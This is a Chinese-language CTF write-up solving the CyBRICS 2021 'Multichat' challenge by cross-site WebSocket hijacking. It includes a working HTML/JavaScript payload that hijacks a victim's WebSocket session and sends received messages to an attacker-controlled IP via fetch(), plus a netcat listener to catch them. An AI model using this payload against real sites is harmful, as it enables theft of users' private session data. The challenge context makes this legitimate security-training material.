2021 CyBRICS Multichat题解

0 前言

这是一个 CSRF 的题目,以前没怎么做过这类题目,还是挺有趣的。HackTrick 中介绍对于这种Cross-site WebSocket hijacking 的介绍挺详细的。传送门

1 题解

  • 在服务器创建文件 w.html(记得将 IP 替换为自己服务器的 IP)

<meta charset="utf-8">
<script>
    function ws(){
        var ws = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
        // 连接成功后的回调函数。
        ws.onopen = function(event){
            // 发送数据
            ws.send("Hey, i forgot the flag. Can you remind me?")
        }
        // 实例对象的onmessage属性,用于指定收到服务器数据后的回调函数
        ws.onmessage = function(event){
            fetch('http://xxx.xxx.xxx.xxx:9999?' + event.data, {mode: 'no-cors'})
        }
    }
    // 调用方法
    ws();
</script>

使用 python3 -m http.server 8080 搭建临时 web 服务,并运行 nc -lvnp 9999 监听请求。

  • 在后台( http://multichat-cybrics2021.ctf.su:5000/ ) 提交 w.html 的 url。即可获得 flag。


2 总结

其实重要的收获不是知识点,而是思想。在比赛前并没有做过这类题目,看完前端的源码之后可以搜索相关的技术和相关的漏洞利用,再结合题目可能的考点是什么。最后再尝试进行解题。

再者就是收集优质的漏洞利用的网站挺重要的,下面是我常用的几个网站

其他小工具类的网站不一一列举了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值